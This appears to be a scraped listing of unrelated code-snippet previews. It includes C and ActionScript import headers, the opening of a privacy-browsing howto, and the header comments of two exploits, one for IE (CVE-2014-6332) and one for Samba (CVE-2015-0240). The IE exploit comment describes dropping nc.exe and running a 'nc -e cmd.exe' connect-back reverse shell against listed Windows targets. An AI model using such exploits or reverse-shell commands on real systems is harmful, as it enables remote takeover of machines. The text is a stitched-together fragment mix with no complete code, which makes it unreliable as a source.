| #define _GNU_SOURCE | |
| #include <stdio.h> | |
| #include <unistd.h> | |
| #include <stdlib.h> | |
| #include <fcntl.h> | |
| #include <signal.h> | |
| #include <elf.h> | |
| #include <err.h> | |
| #include <syslog.h> | |
| #include <sched.h> |
| package | |
| { | |
| import flash.display.MovieClip; | |
| import flash.utils.ByteArray; | |
| import flash.net.URLLoader; | |
| import flash.utils.Timer; | |
| import flash.media.Video; | |
| import flash.display.Loader; | |
| import flash.net.URLRequest; | |
| import flash.events.Event; |
The purpose of this "howto" is to document how browsing can be done in a privacy and security conscious manner. This information is compiled from a number of sources, which are referenced throughout the document, as well as my own experiences with the described technologies.
I welcome contributions and comments on the information contained. Please see the "How to Contribute" section for information on contributing your own knowledge.
| <html> | |
| <head> | |
| <!-- | |
| CVE-2014-6332 exploit to bypass IE protected mode if enabled (with localhost) then get shell | |
| The exploit drops nc.exe then execute "nc -e cmd.exe -n ip port" | |
| 'server_ip' and 'server_port' in javascript below determined the connect back target | |
| Tested on | |
| - IE11 + Windows 7 64-bit (EPM is off) | |
| - IE11 + Windoes 8.1 64-bit (EPM is off) |
| #!/usr/bin/python | |
| """ | |
| Exploit for Samba vulnerabilty (CVE-2015-0240) by sleepya | |
| The exploit only targets vulnerable x86 smbd <3.6.24 which 'creds' is controlled by | |
| ReferentID field of PrimaryName (ServerName). That means '_talloc_zero()' | |
| in libtalloc does not write a value on 'creds' address. | |
| Reference: | |
| - https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/ |
